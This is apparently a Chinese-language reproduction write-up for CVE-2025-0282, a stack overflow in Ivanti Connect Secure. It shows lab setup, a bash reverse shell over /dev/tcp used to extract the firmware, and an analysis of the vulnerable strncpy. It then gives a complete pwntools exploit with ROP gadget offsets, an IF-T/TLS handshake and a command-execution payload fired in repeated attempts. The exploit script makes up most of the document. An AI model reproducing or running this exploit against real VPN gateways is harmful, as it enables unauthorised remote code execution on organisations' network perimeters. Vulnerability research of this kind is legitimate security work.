CVE-2025-0282 ivanti 命令执行漏洞复现

1.启动

https://pulsezta.blob.core.windows.net/gateway/nsa/ISA-V-VMWARE-ICS-22.7R2.3-3431.1.zip

使用这个导入虚拟机，设置ip地址，管理员账户密码，虚拟机设置为nat模式，即可访问到页面

（需要留出20-30GB空间）

2.提取固件

暂停虚拟机

使用010editor打开你对应虚拟机存储目录的后缀为vmem的文件

将其中的/home/bin/dsconfig.pl全部替换为///////////////bin/sh，

(这么多“/”是为了保持长度一致，不产生偏移)

让虚拟机恢复时拿到shell

暂停虚拟机时，需要在这个界面按下enter前暂停，要不然会失败，无法拿到shell。究其原因，可能是因为继续往下走再暂停，/home/bin/dsconfig.pl已经开始执行。

使用另一台虚拟机 nc -lvnp 888

在ivanti上执行

/bin/bash -c 'bash -i >& /dev/tcp/192.168.126.128/8888 0>&1'

放行8000端口，然后使用python启动http服务

iptables -A INPUT -p tcp --dport 8000 -j ACCEPT
python -m SimpleHTTPServer 8000

wget -r -np -nH --cut-dirs=0 \
  --reject-regex '(/proc/|/sys/|/dev/|/run/|/tmp/)' \
  http://192.168.126.130:8000/

下载整个目录

在虚拟机上执行

python3 -m http.server 8001 --bind 0.0.0.0 

然后在ivanti 上

/usr/bin/python -c 'import urllib; urllib.urlretrieve("http://192.168.126.128:8001/gdbserver-7.10.1-x86_32","/tmp/gdbserver")'

下载提前准备好的gdbserver

https://raw.githubusercontent.com/hugsy/gdb-static/master/gdbserver-7.10.1-x86_32

3.漏洞分析

漏洞点位于sub_E4AD0的376行附近

其中控制写入target的数量的参数n_5=*(a1 + 144) + 1

在同函数可以看到*(a1 + 144)被赋值为

strlen(value[“IFT_JNPR_KEY_PREAUTH_INIT_CLIENT_CAPABILITIES”] )，这个值用户可控。

*(a1 + 140)即为value[“IFT_JNPR_KEY_PREAUTH_INIT_CLIENT_CAPABILITIES”]的值。

target在栈上，即此处造成栈溢出。

4.漏洞利用

开放1234端口，方便gdbserver调试使用

iptables -A INPUT -p tcp –dport 1234 -j ACCEPT

iptables -A INPUT -p tcp --dport 1234 -j ACCEPT

/tmp/gdbserver 0.0.0.0:1234 --attach 4633

pwndbg> target remote 192.168.126.130:1234

断点打在触发漏洞的strncpy处，

先设置断点c过去，然后触发脚本，即可成功断到strncpy处。

.text:000E5187                 mov     eax, [eax+8Ch]
.text:000E518D                 mov     [esp+0A0Ch+var_A0C], esi ; dest
.text:000E5190                 mov     [esp+0A0Ch+src], eax ; src
.text:000E5194                 call    _strncpy
.text:000E5199                 lea     eax, [esp+0A0Ch+var

exp利用成功，达到命令执行

调试发现

版本不同，偏移不同，需要根据版本情况调整偏移，和基地址

curl -k --noproxy '*' -s \
"https://192.168.126.130/dana-na/auth/url_admin/welcome.cgi?type=inter" \
| grep -i productversion

获取版本信息

这段payload通过执行完strncpy下面的这段代码，通过提前布置好相对esp的偏移的参数来传递参数

最后通过call dword ptr [eax+48h] 截取执行流

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *
import requests
import urllib3
import re
import time
import ssl

urllib3.disable_warnings()

context(os='linux', arch='i386', endian='little')
context.log_level = 'debug' if args.DEBUG else 'info'

HOST  = '192.168.126.130'
PORT  = int(args.PORT or 443)
COUNT = int(args.COUNT or 2048)

VENDOR_TCG     = 0x00005597       
VENDOR_JUNIPER = 0x00000a4c       

IFT_VERSION_REQUEST = 0x00000001  #VERSION_REQUEST
IFT_EXPLOIT_TYPE    = 0x00000088  #进入 clientCapabilities 解析路径的消息类型

pie_base=0x56653000 
#0x56734194                   0x0e5194

targets = {
    '22.7.2.3431': {
        'padding_to_vftable': 2288,
        'vftable_gadget_offset': 0x00934365 + 2,
        'padding_to_next_frame': 2934,

        'offset_to_got_plt': 0x00157c000,

        'gadget_inc_ebx_ret': 0x00032233,
        'gadget_mov_eax_esp_retn_c': 0x00ca2e84,
        'gadget_add_eax_8_ret': 0x007a040c,
        'gadget_mov_esp_eax_call_system': 0x004f0df3,

        'libdsplibs_base': 0xf644c000,
    }
}


def lg(name, value):
    log.info(f'{name:<28}: {hex(value) if isinstance(value, int) else value}')


def get_version():
    return '22.7.2.3431'




def start():

    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE

    # 强制 TLS 1.2
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.maximum_version = ssl.TLSVersion.TLSv1_2

    return remote(
        HOST,
        PORT,
        ssl=True,
        ssl_context=ctx,
        sni=False,
        timeout=3000
    )


def upgrade_to_ift_tls(io):
    req = (
        f'GET / HTTP/1.1\r\n'
        f'Host: {HOST}:{PORT}\r\n'
        f'User-Agent: AnyConnect-compatible OpenConnect VPN Agent v9.12-188-gaebfabb3-dirty\r\n'
        f'Content-Type: EAP\r\n'
        f'Upgrade: IF-T/TLS 1.0\r\n'
        f'Content-Length: 0\r\n'
        f'\r\n'
    ).encode()

    io.send(req)

    res = io.recv(4096, timeout=3000)

    log.info('upgrade response:')
    print(hexdump(res))

    if b'101 Switching Protocols' not in res:
        log.failure('IF-T/TLS upgrade failed')
        return False

    log.success('IF-T/TLS upgrade success')
    return True


def ift_packet(vendor, msg_type, seq_id, body):
    header = flat(
        [
            vendor,
            msg_type,
            len(body) + 0x10,
            seq_id,
        ],
        word_size=32,
        endianness='big',
        sign=False
    )

    return header + body


def version_packet():
    body = flat(
        [
            0x00,
            0x01,
            0x02,
            0x02,
        ],
        word_size=8
    )

    return ift_packet(
        vendor=VENDOR_TCG,
        msg_type=IFT_VERSION_REQUEST,
        seq_id=0,
        body=body
    )


def build_cmd():

    cmd = 'id>/tmp/pwned'

    cmd = cmd.replace(' ', '${IFS}')

    log.info(f'cmd: {cmd}')

    return cmd.encode() + b'\x00'


def build_rop(t):
    base = int(args.BASE, 16) if args.BASE else t['libdsplibs_base']

    lg('libdsplibs_base', base)
    lg('vftable gadget', base + t['vftable_gadget_offset'])
    lg('got plt - 1', base + t['offset_to_got_plt'] - 1)
    lg('inc ebx; ret', base + t['gadget_inc_ebx_ret'])
    lg('mov eax, esp; retn c', base + t['gadget_mov_eax_esp_retn_c'])
    lg('add eax, 8; ret', base + t['gadget_add_eax_8_ret'])
    lg('mov esp, eax; call system', base + t['gadget_mov_esp_eax_call_system'])

    payload  = b'C' * t['padding_to_vftable']
    payload += p32(base + t['vftable_gadget_offset'])
    
    payload += b'A' * t['padding_to_next_frame']
    payload += p32(base + t['offset_to_got_plt'] - 1)
    # payload+=b"a"*4

    payload += p32(0xCAFEBEEF) * 3

    payload += p32(base + t['gadget_inc_ebx_ret'])
    payload += p32(base + t['gadget_mov_eax_esp_retn_c'])
    payload += p32(base + t['gadget_add_eax_8_ret'])

    payload += p32(0xCAFEBEEF) * 3

    payload += p32(base + t['gadget_add_eax_8_ret']) * 4

    payload += p32(base + t['gadget_mov_esp_eax_call_system'])
    payload += p32(0xCAFEBEEF)

    return payload


def build_payload(t):
    rop = build_rop(t)
    cmd = build_cmd()

    payload = (
        b'clientHostName=abcdefgh '
        b'clientIp=127.0.0.1 '
        b'clientCapabilities=' +
        rop +
        cmd +
        b'\n\x00'
    )

    log.info(f'raw payload length: {len(payload)}')

    if args.SAVE:
        open(args.SAVE, 'wb').write(payload)
        log.success(f'payload saved to {args.SAVE}')

    return payload


def exploit_packet(t):
    body = build_payload(t)

    pkt = ift_packet(
        vendor=VENDOR_JUNIPER,
        msg_type=IFT_EXPLOIT_TYPE,
        seq_id=1,
        body=body
    )

    log.info(f'exploit packet length: {len(pkt)}')

    return pkt


def attack_once(t, idx):
    io = None

    try:
        log.info(f'attack attempt #{idx}')

        io = start()

        if not upgrade_to_ift_tls(io):
            io.close()
            return False

        pkt1 = version_packet()
        pkt2 = exploit_packet(t)

        io.send(pkt1)
        time.sleep(0.1)

        io.send(pkt2)
        time.sleep(1)

        io.close()
        return True

    except EOFError:
        log.warning('EOF')

    except Exception as e:
        log.warning(f'error: {e}')

    finally:
        if io:
            try:
                io.close()
            except Exception:
                pass

    return False


def choose_target():
    if args.VERSION:
        version = args.VERSION
        log.info(f'use version from args: {version}')
    else:
        version = get_version()
        if not version:
            log.failure('failed to detect product version')
            exit(1)

        log.success(f'detected version: {version}')

    if version not in targets:
        log.failure(f'no target config for version: {version}')
        log.info(f'available versions: {list(targets.keys())}')
        exit(1)

    return targets[version]


def pwn():
    log.info(f'target: {HOST}:{PORT}')

    t = choose_target()

    if args.ONCE:
        attack_once(t, 1)
        return

    for i in range(1, COUNT + 1):
        attack_once(t, i)


if __name__ == '__main__':
    pwn()

5.参考

[原创]ivanti CVE-2025-0282 漏洞复现-二进制漏洞-看雪安全社区｜专业技术交流与安全研究论坛

Ivanti Connect Secure栈溢出漏洞（CVE-2025-0282）分析与复现 - FreeBuf网络安全行业门户